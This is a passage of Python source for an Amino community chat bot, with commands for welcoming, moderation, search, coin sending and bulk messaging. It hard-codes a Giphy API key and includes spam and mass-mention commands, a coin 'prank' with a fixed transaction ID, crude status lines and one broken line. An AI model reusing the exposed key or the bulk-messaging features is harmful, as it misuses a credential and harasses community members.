suppress(Exception):\n\t\t\t\t\tself.send_message(chatId=self.welcome_chat,\n\t\t\t\t\t message=f\"Welcome here ‎‏‎‏@{name}!‬‭\",\n\t\t\t\t\t mentionUserIds=[uid])\n\n\t\tnew_users = self.subclient.get_all_users(start=0,\n\t\t size=30,\n\t\t type=\"recent\")\n\t\tself.new_users = [\n\t\t elem[\"uid\"] for elem in new_users.json[\"userProfileList\"]\n\t\t]\n\n\tdef welcome_new_member(self):\n\t\tnew_list = self.subclient.get_all_users(start=0,\n\t\t size=25,\n\t\t type=\"recent\")\n\t\tnew_member = [(elem[\"nickname\"], elem[\"uid\"])\n\t\t for elem in new_list.json[\"userProfileList\"]]\n\n\t\tfor elem in new_member:\n\t\t\tname, uid = elem[0], elem[1]\n\n\t\t\ttry:\n\t\t\t\tval = self.subclient.get_wall_comments(\n\t\t\t\t userId=uid, sorting='newest').commentId\n\t\t\texcept Exception:\n\t\t\t\tval = True\n\n\t\t\tif not val and uid not in self.new_users and self.message_bvn:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tself.subclient.comment(message=self.message_bvn,\n\t\t\t\t\t userId=uid)\n\n\t\t\tif uid not in self.new_users and self.welcome_chat:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tself.send_message(chatId=self.welcome_chat,\n\t\t\t\t\t message=f\"Welcome here ‎‏‎‏@{name}!‬‭\",\n\t\t\t\t\t mentionUserIds=[uid])\n\n\t\tnew_users = self.subclient.get_all_users(start=0,\n\t\t size=30,\n\t\t type=\"recent\")\n\t\tself.new_users = [\n\t\t elem[\"uid\"] for elem in new_users.json[\"userProfileList\"]\n\t\t]\n\n\tdef feature_chats(self):\n\t\tfor elem in self.favorite_chats:\n\t\t\twith suppress(Exception):\n\t\t\t\tself.favorite(time=2, userId=elem)\n\n\tdef feature_users(self):\n\t\tfeatured = [\n\t\t elem[\"uid\"] for elem in\n\t\t self.subclient.get_featured_users().json[\"userProfileList\"]\n\t\t]\n\t\tfor elem in self.favorite_users:\n\t\t\tif elem not in featured:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tself.favorite(time=1, userId=elem)\n\n\tdef get_member_level(self, uid):\n\t\treturn self.subclient.get_user_info(userId=uid).level\n\n\tdef is_level_good(self, uid):\n\t\treturn self.subclient.get_user_info(userId=uid).level >= self.level\n\n\tdef get_member_titles(self, uid):\n\t\twith suppress(Exception):\n\t\t\treturn self.subclient.get_user_info(userId=uid).customTitles\n\t\treturn False\n\n\tdef get_member_info(self, uid):\n\t\treturn self.subclient.get_user_info(userId=uid)\n\n\tdef get_message_info(self, chatId=None, messageId=None):\n\t\treturn self.subclient.get_message_info(chatId=chatId,\n\t\t messageId=messageId)\n\n\tdef get_wallet_info(self):\n\t\treturn self.client.get_wallet_info().json\n\n\tdef ban(self, userId: str, reason: str, banType: int = None):\n\t\tself.subclient.ban(userId, reason, banType)\n\n\tdef get_wallet_amount(self):\n\t\treturn self.client.get_wallet_info().totalCoins\n\n\tdef pay(self,\n\t coins: int = 0,\n\t blogId: str = None,\n\t chatId: str = None,\n\t objectId: str = None,\n\t transactionId: str = None):\n\t\tif not transactionId:\n\t\t\ttransactionId = f\"{''.join(sample([lst for lst in hexdigits[:-6]], 8))}-{''.join(sample([lst for lst in hexdigits[:-6]], 4))}-{''.join(sample([lst for lst in hexdigits[:-6]], 4))}-{''.join(sample([lst for lst in hexdigits[:-6]], 4))}-{''.join(sample([lst for lst in hexdigits[:-6]], 12))}\"\n\t\tself.subclient.send_coins(coins=coins,\n\t\t blogId=blogId,\n\t\t chatId=chatId,\n\t\t objectId=objectId,\n\t\t transactionId=transactionId)\n\n\tdef edit_chat(self,\n\t chatId: str,\n\t doNotDisturb: bool = None,\n\t pinChat: bool = None,\n\t title: str = None,\n\t icon: str = None,\n\t backgroundImage: str = None,\n\t content: str = None,\n\t announcement: str = None,\n\t coHosts: list = None,\n\t keywords: list = None,\n\t pinAnnouncement: bool = None,\n\t publishToGlobal: bool = None,\n\t canTip: bool = None,\n\t viewOnly: bool = None,\n\t canInvite: bool = None,\n\t fansOnly: bool = None):\n\t\tself.subclient.edit_chat(chatId, doNotDisturb, pinChat, title, icon,\n\t\t backgroundImage, content, announcement,\n\t\t coHosts, keywords, pinAnnouncement,\n\t\t publishToGlobal, canTip, viewOnly, canInvite,\n\t\t fansOnly)\n\n\tdef get_message_level(self, level: int):\n\t\treturn f\"You need the level {level} to do this command\"\n\n\tdef delete_message(self,\n\t chatId: str,\n\t messageId: str,\n\t reason: str = \"Clear\",\n\t asStaff: bool = False):\n\t\tself.subclient.delete_message(chatId, messageId, asStaff, reason)\n\n\tdef kick(self, userId: str, chatId: str, allowRejoin: bool = True):\n\t\tself.subclient.kick(userId, chatId, allowRejoin)\n\n\tdef edit_profile(self,\n\t nickname: str = None,\n\t content: str = None,\n\t icon: str = None,\n\t chatRequestPrivilege: str = None,\n\t mediaList: list = None,\n\t backgroundImage: str = None,\n\t backgroundColor: str = None,\n\t titles: list = None,\n\t defaultBubbleId: str = None):\n\t\tself.subclient.edit_profile(nickname, content, icon,\n\t\t chatRequestPrivilege, mediaList,\n\t\t backgroundImage, backgroundColor, titles,\n\t\t defaultBubbleId)\n\n\tdef send_message(self,\n\t chatId: str = None,\n\t message: str = \"None\",\n\t messageType: str = None,\n\t file: str = None,\n\t fileType: str = None,\n\t replyTo: str = None,\n\t mentionUserIds: str = None):\n\t\tself.subclient.send_message(chatId=chatId,\n\t\t message=message,\n\t\t file=file,\n\t\t fileType=fileType,\n\t\t replyTo=replyTo,\n\t\t messageType=messageType,\n\t\t mentionUserIds=mentionUserIds)\n\n\tdef favorite(self,\n\t time: int = 1,\n\t userId: str = None,\n\t chatId: str = None,\n\t blogId: str = None,\n\t wikiId: str = None):\n\t\tself.subclient.feature(time=time,\n\t\t userId=userId,\n\t\t chatId=chatId,\n\t\t blogId=blogId,\n\t\t wikiId=wikiId)\n\n\tdef unfavorite(self,\n\t userId: str = None,\n\t chatId: str = None,\n\t blogId: str = None,\n\t wikiId: str = None):\n\t\tself.subclient.unfeature(userId=userId,\n\t\t chatId=chatId,\n\t\t blogId=blogId,\n\t\t wikiId=wikiId)\n\n\tdef join_chat(self, chat: str, chatId: str = None):\n\t\tchat = chat.replace(\"http:aminoapps.com/p/\", \"\")\n\t\tif not chat:\n\t\t\twith suppress(Exception):\n\t\t\t\tself.subclient.join_chat(chatId)\n\t\t\t\treturn \"\"\n\n\t\t\twith suppress(Exception):\n\t\t\t\tchati = self.subclient.get_from_code(\n\t\t\t\t f\"http://aminoapps.com/c/{chat}\").objectId\n\t\t\t\tself.subclient.join_chat(chati)\n\t\t\t\treturn chat\n\n\t\tchats = self.subclient.get_public_chat_threads()\n\t\tfor title, chat_id in zip(chats.title, chats.chatId):\n\t\t\tif chat == title:\n\t\t\t\tself.subclient.join_chat(chat_id)\n\t\t\t\treturn title\n\n\t\tchats = self.subclient.get_public_chat_threads()\n\t\tfor title, chat_id in zip(chats.title, chats.chatId):\n\t\t\tif chat.lower() in title.lower() or chat == chat_id:\n\t\t\t\tself.subclient.join_chat(chat_id)\n\t\t\t\treturn title\n\n\t\treturn False\n\n\tdef get_chats(self):\n\t\treturn self.subclient.get_public_chat_threads()\n\n\tdef join_all_chat(self):\n\t\tfor elem in self.subclient.get_public_chat_threads(size=50).chatId:\n\t\t\twith suppress(Exception):\n\t\t\t\tself.subclient.join_chat(elem)\n\n\tdef leave_chat(self, chat: str):\n\t\tself.subclient.leave_chat(chat)\n\n\tdef leave_all_chats(self):\n\t\tfor elem in self.subclient.get_public_chat_threads(size=100).chatId:\n\t\t\twith suppress(Exception):\n\t\t\t\tself.subclient.leave_chat(elem)\n\n\tdef follow_user(self, uid):\n\t\tself.subclient.follow(userId=[uid])\n\n\tdef unfollow_user(self, uid):\n\t\tself.subclient.unfollow(userId=uid)\n\n\tdef add_title(self, uid, title: str, color: str = None):\n\t\tmember = self.get_member_titles(uid)\n\t\ttlist = []\n\t\tclist = []\n\t\twith suppress(Exception):\n\t\t\ttlist = [elem['title'] for elem in member]\n\t\t\tclist = [elem['color'] for elem in member]\n\t\ttlist.append(title)\n\t\tclist.append(color)\n\n\t\twith suppress(Exception):\n\t\t\tself.subclient.edit_titles(uid, tlist, clist)\n\t\treturn True\n\n\tdef remove_title(self, uid, title: str):\n\t\tmember = self.get_member_titles(uid)\n\t\ttlist = []\n\t\tclist = []\n\t\tfor elem in member:\n\t\t\ttlist.append(elem[\"title\"])\n\t\t\tclist.append(elem[\"color\"])\n\n\t\tif title in tlist:\n\t\t\tnb = tlist.index(title)\n\t\t\ttlist.pop(nb)\n\t\t\tclist.pop(nb)\n\t\t\tself.subclient.edit_titles(uid, tlist, clist)\n\t\treturn True\n\n\tdef passive(self):\n\t\ti = 30\n\t\tj = 470\n\t\tk = 7170\n\t\tm = 86370\n\t\to = 0\n\t\tactivities = [\n\t\t f\"{self.prefix}𝑼 𝒔𝒐𝒖𝒏𝒅𝒔 𝒃𝒆𝒕𝒕𝒆𝒓 𝒘𝒊𝒕𝒉 𝒚𝒐𝒖𝒓 𝒎𝒐𝒖𝒕𝒉 𝒄𝒍𝒐𝒔𝒆𝒅\",\n\t\t \"𝑼 𝒔𝒐𝒖𝒏𝒅𝒔 𝒃𝒆𝒕𝒕𝒆𝒓 𝒘𝒊𝒕𝒉 𝒚𝒐𝒖𝒓 𝒎𝒐𝒖𝒕𝒉 𝒄𝒍𝒐𝒔𝒆𝒅\",\n\t\t f\"{self.prefix}𝑩𝒐𝒐𝒃𝒔 𝒂𝒓𝒆 𝒕𝒉𝒆 𝒑𝒓𝒐𝒐𝒇 𝒕𝒉𝒂𝒕 𝒎𝒂𝒏 𝒄𝒂𝒏 𝒇𝒐𝒄𝒖𝒔 𝒐𝒏 𝒕𝒘𝒐 𝒕𝒉𝒊𝒏𝒈𝒔 𝒂𝒕 𝒐𝒏𝒄𝒆\"\n\t\t]\n\t\twhile self.marche:\n\t\t\tif i >= 60:\n\t\t\t\tif self.welcome_chat or self.message_bvn:\n\t\t\t\t\tThread(target=self.welcome_new_member).start()\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tself.subclient.activity_status('on')\n\t\t\t\ti = 0\n\t\t\t\to += 1\n\t\t\t\tif o > len(activities) - 1:\n\t\t\t\t\to = 0\n\t\t\tif j >= 500:\n\t\t\t\tif self.welcome_chat or self.message_bvn:\n\t\t\t\t\twith suppress(Exception):\n\t\t\t\t\t\tThread(target=self.check_new_member).start()\n\t\t\t\tj = 0\n\n\t\t\tif k >= 7200 and self.favorite_chats:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tThread(target=self.feature_chats).start()\n\t\t\t\tk = 0\n\n\t\t\tif m >= 86400 and self.favorite_users:\n\t\t\t\twith suppress(Exception):\n\t\t\t\t\tThread(target=self.feature_users).start()\n\t\t\t\tm = 0\n\n\t\t\tk += 10\n\t\t\tm += 10\n\t\t\tj += 10\n\t\t\ti += 10\n\n\t\t\tsleep(10)\n\n\tdef run(self):\n\t\tThread(target=self.passive).start()\n\n\ndef is_it_bot(uid):\n\treturn uid == botId\n\n\ndef is_it_me(uid):\n\treturn uid in ('d656e556-57ba-4f69-8c1c-07848e7800d8',\n\t 'e123f164-2e43-4ec7-96ee-36c121977f9e')\n\n\ndef is_it_admin(uid):\n\treturn uid in perms_list\n\n\ndef join_community(comId: str = None, inv: str = None):\n\twith suppress(Exception):\n\t\tclient.join_community(comId=comId, invitationId=inv)\n\t\treturn 1\n\n\tif inv:\n\t\twith suppress(Exception):\n\t\t\tclient.request_join_community(comId=comId,\n\t\t\t message='ass for everyone!!')\n\t\t\treturn 2\n\n\ndef join_amino(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tinvit = None\n\tif taille_commu >= 20 and not (is_it_me(authorId)\n\t or is_it_admin(authorId)):\n\t\tsubClient.send_message(chatId,\n\t\t \"The bot has joined too many communities!\")\n\t\treturn\n\n\tstaff = subClient.get_staff(message)\n\tif not staff:\n\t\tsubClient.send_message(chatId, \"Wrong amino ID!\")\n\t\treturn\n\n\ttry:\n\t\ttest = message.strip().split()\n\t\tamino_c = test[0]\n\t\tinvit = test[1]\n\t\tinvit = invit.replace(\"http://aminoapps.com/invite/\", \"\")\n\texcept Exception:\n\t\tamino_c = message\n\t\tinvit = None\n\n\ttry:\n\t\tval = subClient.client.get_from_code(\n\t\t f\"http://aminoapps.com/c/{amino_c}\")\n\t\tcomId = val.json[\"extensions\"][\"community\"][\"ndcId\"]\n\texcept Exception:\n\t\tval = \"\"\n\n\tisJoined = val.json[\"extensions\"][\"isCurrentUserJoined\"]\n\tif not isJoined:\n\t\tjoin_community(comId, invit)\n\t\tval = client.get_from_code(f\"http://aminoapps.com/c/{amino_c}\")\n\t\tisJoined = val.json[\"extensions\"][\"isCurrentUserJoined\"]\n\t\tif isJoined:\n\t\t\tcommunaute[comId] = BotAmino(client=client, community=message)\n\t\t\tcommunaute[comId].run()\n\t\t\tsubClient.send_message(chatId, \"Joined!\")\n\t\t\treturn\n\t\tsubClient.send_message(chatId, \"Waiting for join!\")\n\t\treturn\n\telse:\n\t\tsubClient.send_message(chatId, \"Allready joined!\")\n\t\treturn\n\n\tsubClient.send_message(chatId, \"Waiting for join!\")\n\n\ndef title(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(botId):\n\t\tcolor = None\n\t\ttry:\n\t\t\telem = message.strip().split(\"color=\")\n\t\t\tmessage, color = elem[0], elem[1].strip()\n\t\t\tif not color.startswith(\"#\"):\n\t\t\t\tcolor = \"#\" + color\n\t\t\tval = subClient.add_title(authorId, message, color)\n\t\texcept Exception:\n\t\t\tval = subClient.add_title(authorId, message)\n\n\t\tif val:\n\t\t\tsubClient.send_message(chatId,\n\t\t\t f\"The titles of {author} has changed\")\n\t\telse:\n\t\t\tsubClient.send_mesubClient.send_message(\n\t\t\t chatId, subClient.get_message_level(subClient.lvl_min))\n\n\ndef cus_k(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsubClient.send_message(chatId, f\"Here is a {message} for {author} \")\n\n\ndef hh(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsubClient.subclient.accept_organizer(chatId)\n\tsubClient.send_message(chatId, \"accepted\")\n\n\ndef dice(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif not message:\n\t\tsubClient.send_message(chatId, f\"🎲 -{randint(1, 20)},(1-20)- 🎲\")\n\t\treturn\n\n\twith suppress(Exception):\n\t\tpt = message.split('d')\n\t\tval = ''\n\t\tcpt = 0\n\t\tif int(pt[0]) > 20:\n\t\t\tpt[0] = 20\n\t\tif int(pt[1]) > 1000000:\n\t\t\tpt[1] = 1000000\n\t\tfor _ in range(int(pt[0])):\n\t\t\tppt = randint(1, int(pt[1]))\n\t\t\tcpt += ppt\n\t\t\tval += str(ppt) + \" \"\n\t\tprint(f'🎲 -{cpt},[ {val}](1-{pt[1]})- 🎲')\n\t\tsubClient.send_message(chatId, f'🎲 -{cpt},[ {val}](1-{pt[1]})- 🎲')\n\n\ndef join(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tval = subClient.join_chat(message, chatId)\n\tif val or val == \"\":\n\t\tsubClient.send_message(chatId, f\"Chat {val} joined\".strip())\n\telse:\n\t\tsubClient.send_message(chatId, \"No chat joined\")\n\n\ndef join_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.join_all_chat()\n\t\tsubClient.send_message(chatId, \"All chat joined\")\n\n\ndef leave_all(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.send_message(chatId, \"Leaving all chat...\")\n\t\tsubClient.leave_all_chats()\n\n\ndef leave(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif message and (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tchat_ide = subClient.get_chat_id(message)\n\t\tif chat_ide:\n\t\t\tchatId = chat_ide\n\tsubClient.leave_chat(chatId)\n\n\ndef clear(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif (subClient.is_in_staff(authorId) or is_it_me(authorId)\n\t or is_it_admin(authorId)) and subClient.is_in_staff(botId):\n\t\tsize = 1\n\t\tmsg = \"\"\n\t\tval = \"\"\n\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\tif \"chat=\" in message and (is_it_me(authorId)\n\t\t or is_it_admin(authorId)):\n\t\t\tchat_name = message.rsplit(\"chat=\", 1).pop()\n\t\t\tchat_ide = subClient.get_chat_id(chat_name)\n\t\t\tif chat_ide:\n\t\t\t\tchatId = chat_ide\n\t\t\tmessage = \" \".join(message.strip().split()[:-1])\n\n\t\twith suppress(Exception):\n\t\t\tsize = int(message.strip().split(' ').pop())\n\t\t\tmsg = ' '.join(message.strip().split(' ')[:-1])\n\n\t\tif size > 50 and not is_it_me(authorId):\n\t\t\tsize = 50\n\n\t\tif msg:\n\t\t\ttry:\n\t\t\t\tval = subClient.get_user_id(msg)\n\t\t\texcept Exception:\n\t\t\t\tval = \"\"\n\n\t\tmessages = subClient.subclient.get_chat_messages(chatId=chatId,\n\t\t size=size)\n\n\t\tfor message, authorId in zip(messages.messageId,\n\t\t messages.author.userId):\n\t\t\tif not val:\n\t\t\t\tsubClient.delete_message(chatId, message, asStaff=True)\n\t\t\telif authorId == val[1]:\n\t\t\t\tsubClient.delete_message(chatId, message, asStaff=True)\n\n\ndef spam(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\ttry:\n\t\tsize = int(message.strip().split().pop())\n\t\tmsg = \" \".join(message.strip().split()[:-1])\n\texcept ValueError:\n\t\tsize = 1\n\t\tmsg = message\n\n\tif size > 3:\n\t\tsize = 3\n\n\tfor _ in range(size):\n\t\twith suppress(Exception):\n\t\t\tsubClient.send_message(chatId, msg)\n\n\ndef mention(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif \"chat=\" in message and (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tchat_name = message.rsplit(\"chat=\", 1).pop()\n\t\tchat_ide = subClient.get_chat_id(chat_name)\n\t\tif chat_ide:\n\t\t\tchatId = chat_ide\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\ttry:\n\t\tsize = int(message.strip().split().pop())\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\texcept ValueError:\n\t\tsize = 1\n\n\tval = subClient.get_user_id(message)\n\tif not val:\n\t\tsubClient.send_message(chatId=chatId, message=\"Username not found\")\n\t\treturn\n\n\tif size > 5 and not (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tsize = 5\n\n\tif val:\n\t\tfor _ in range(size):\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.send_message(chatId=chatId,\n\t\t\t\t message=f\"‎‏‎‏@{val[0]}‬‭\",\n\t\t\t\t mentionUserIds=[val[1]])\n\n\ndef mentionall(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tif message and is_it_me(authorId):\n\t\t\tchat_ide = subClient.get_chat_id(message)\n\t\t\tif chat_ide:\n\t\t\t\tchatId = chat_ide\n\t\t\tmessage = \" \".join(message.strip().split()[:-1])\n\n\t\tmention = [\n\t\t userId for userId in subClient.subclient.get_chat_users(\n\t\t chatId=chatId).userId\n\t\t]\n\t\ttest = \"\".join([\n\t\t \"‎‏‎‏‬‭\" for user in subClient.subclient.get_chat_users(\n\t\t chatId=chatId).userId\n\t\t])\n\n\t\twith suppress(Exception):\n\t\t\tsubClient.send_message(chatId=chatId,\n\t\t\t message=f\"@everyone{test}\",\n\t\t\t mentionUserIds=mention)\n\n\ndef join_vc(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tclient.join_voice_chat2(chatId=chatId, comId=subClient.community_id)\n\n\ndef msg(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tvalue = 0\n\tsize = 1\n\tment = None\n\twith suppress(Exception):\n\t\ttry:\n\t\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\texcept:\n\t\t\tsubClient.delete_message(chatId, messageId)\n\n\tif \"chat=\" in message and (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tchat_name = message.rsplit(\"chat=\", 1).pop()\n\t\tchat_ide = subClient.get_chat_id(chat_name)\n\t\tif chat_ide:\n\t\t\tchatId = chat_ide\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\n\ttry:\n\t\tsize = int(message.split().pop())\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\texcept ValueError:\n\t\tsize = 0\n\n\ttry:\n\t\tvalue = int(message.split().pop())\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\texcept ValueError:\n\t\tvalue = size\n\t\tsize = 1\n\n\tif not message and value == 1:\n\t\tmessage = f\"‎‏‎‏@{author}‬‭\"\n\t\tment = authorId\n\n\tif size > 3:\n\t\tsize = 3\n\n\tfor _ in range(size):\n\t\twith suppress(Exception):\n\t\t\tsubClient.send_message(chatId=chatId,\n\t\t\t message=f\"{message}\",\n\t\t\t messageType=value,\n\t\t\t mentionUserIds=ment)\n\n\ndef add_banned_word(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tif not message or message in subClient.banned_words:\n\t\t\treturn\n\t\ttry:\n\t\t\tmessage = message.lower().strip().split()\n\t\texcept Exception:\n\t\t\tmessage = [message.lower().strip()]\n\t\tsubClient.add_banned_words(message)\n\t\tsubClient.send_message(chatId, \"Banned word list updated\")\n\n\ndef remove_banned_word(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tif not message:\n\t\t\treturn\n\t\ttry:\n\t\t\tmessage = message.lower().strip().split()\n\t\texcept Exception:\n\t\t\tmessage = [message.lower().strip()]\n\t\tsubClient.remove_banned_words(message)\n\t\tsubClient.send_message(chatId, \"Banned word list updated\")\n\n\ndef start_vc(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsleep(1)\n\tclient.start_vc(chatId=chatId, comId=subClient.community_id, role=message)\n\n\ndef end_vc(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tclient.end_vc(chatId=chatId, comId=subClient.community_id)\n\n\ndef banned_word_list(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tval = \"\"\n\tif subClient.banned_words:\n\t\tfor elem in subClient.banned_words:\n\t\t\tval += elem + \"\\n\"\n\telse:\n\t\tval = \"No words in the list\"\n\tsubClient.send_message(chatId, val)\n\n\ndef sw(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.set_welcome_message(message)\n\t\tsubClient.send_message(chatId, \"Welcome message changed\")\n\n\ndef get_chats(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tval = subClient.get_chats()\n\tfor title, _ in zip(val.title, val.chatId):\n\t\tsubClient.send_message(chatId, title)\n\n\ndef chat_id(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif is_it_me(authorId) or is_it_admin(authorId):\n\t\tval = subClient.get_chats()\n\t\tfor title, chat_id in zip(val.title, val.chatId):\n\t\t\tif message.lower() in title.lower():\n\t\t\t\tsubClient.send_message(chatId, f\"{title} | {chat_id}\")\n\n\ndef leave_amino(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tif subClient.is_in_staff(authorId) or is_it_me(authorId) or is_it_admin(\n\t authorId):\n\t\tsubClient.send_message(chatId, \"Leaving the amino!\")\n\t\tsubClient.leave_community()\n\tdel communaute[subClient.community_id]\n\n\ndef src(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tvalue = 0\n\tsize = 1\n\tment = None\n\twith suppress(Exception):\n\t\ttry:\n\t\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\texcept:\n\t\t\tsubClient.delete_message(chatId, messageId)\n\n\ttry:\n\t\tsize = int(message.split().pop())\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\texcept ValueError:\n\t\tsize = 0\n\n\ttry:\n\t\tvalue = int(message.split().pop())\n\t\tmessage = \" \".join(message.strip().split()[:-1])\n\texcept ValueError:\n\t\tvalue = size\n\t\tsize = 1\n\n\tif not message and value == 1:\n\t\tmessage = f\"‎‏‎‏@{author}‬‭\"\n\t\tment = authorId\n\n\tif size > 10 and not (is_it_me(authorId) or is_it_admin(authorId)):\n\t\tsize = 10\n\n\tsearch_word = message\n\tresponse = duckduckpy.query(message, container='dict')\n\tanswer = response['abstract_text']\n\tif len(answer) < 5:\n\t\tanswer = \"Refer Below Link\"\n\tanswer_url = response['abstract_url']\n\tif len(answer_url):\n\t\treply = \"-----------------------------------------------------------------\\n[BC]Search Result\\n-----------------------------------------------------------------\\nWord: \" + str(\n\t\t search_word\n\t\t) + \"\\nResult: \" + str(answer) + \"\\nSoucre URL: \" + str(\n\t\t answer_url\n\t\t) + \"\\n-----------------------------------------------------------------\"\n\tif len(answer_url) == 0:\n\t\treply = \"[C] No Result Found\"\n\tprint(\"reply\", reply)\n\tfor _ in range(size):\n\t\twith suppress(Exception):\n\t\t\tsubClient.send_message(chatId=chatId,\n\t\t\t message=f\"{reply}\",\n\t\t\t messageType=value,\n\t\t\t mentionUserIds=ment)\n\n\ndef img_search(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsearch_phrase = message\n\twith suppress(Exception):\n\t\ttry:\n\t\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\texcept:\n\t\t\tsubClient.delete_message(chatId, messageId)\n\tpath = \"https://www.google.co.in/search?q={0}&source=lnms&tbm=isch\"\n\tpath1 = path.format(search_phrase)\n\trequete = requests.get(path1)\n\tpage = requete.content\n\tsoup = bs4.BeautifulSoup(page, \"html.parser\")\n\t# print(\"\\n\\n\",soup.find_all(\"img\"),\"\\n\\n\")\n\tpropriete = soup.find_all(\"img\")[1]\n\t# Ketan Edit 1.23\n\tpropriete = str(propriete).split(\"src=\")[1][:-2]\n\tprint(\"propriete\", propriete)\n\timage = propriete + \".jpg\"\n\timage = (image.replace('\"', ''))\n\tif image is not None:\n\t\tprint(image)\n\t\tfilename = image.split(\"tbn:\")[-1]\n\t\turllib.request.urlretrieve(image, filename)\n\t\twith open(filename, 'rb') as fp:\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"image\")\n\t\t\t\tprint(os.remove(filename))\n\n\ndef gif_search(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tsearch = message\n\twith suppress(Exception):\n\t\ttry:\n\t\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\texcept:\n\t\t\tsubClient.delete_message(chatId, messageId)\n\tresponse = requests.get(\n\t 'http://api.giphy.com/v1/gifs/search?q=' + search +\n\t '&api_key=1jdqvfFwB2Vf12z6ZJ72sqkYm1yz0VVM&limit=10')\n\t# print(response.text)\n\tdata = json.loads(response.text)\n\tgif_choice = random.randint(0, 9)\n\timage = data['data'][gif_choice]['images']['original']['url']\n\tprint(\"URL\", image)\n\tif image is not None:\n\t\tprint(image)\n\t\tfilename = image.split(\"/\")[-1]\n\t\turllib.request.urlretrieve(image, filename)\n\t\twith open(filename, 'rb') as fp:\n\t\t\twith suppress(Exception):\n\t\t\t\tsubClient.send_message(chatId, file=fp, fileType=\"gif\")\n\t\t\t\tprint(os.remove(filename))\n\n\ndef prank(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tcoins_val = (message)\n\twith suppress(Exception):\n\t\ttry:\n\t\t\tsubClient.delete_message(chatId, messageId, asStaff=True)\n\t\texcept:\n\t\t\tsubClient.delete_message(chatId, messageId)\n\n\ttransactionId = \"18eb0607-0aa0-4b86-a420-06fc1156cd0a\"\n\told_chat = None\n\tif message and is_it_me(authorId):\n\t\tchat_ide = subClient.get_chat_id(message)\n\t\tif chat_ide:\n\t\t\told_chat = chatId\n\t\t\tchatId = chat_ide\n\tfor _ in range(1):\n\t\tsubClient.subclient.send_coins(coins=int(coins_val),\n\t\t chatId=chatId,\n\t\t transactionId=transactionId)\n\n\tif old_chat:\n\t\tchatId = old_chat\n\t\tsubClient.send_message(chatId, \"Done\")\n\n\ndef image(subClient=None,\n chatId=None,\n authorId=None,\n author=None,\n message=None,\n messageId=None):\n\tval = os.listdir(\"pictures\")\n\tif val:\n\t\tfile = choice(val)\n\t\twith suppress(Exception):\n\t\t\twith open(path_picture + file, 'rb') as fp:\n\t\t\t\tsubClient.send_message(chatId, file=fp, 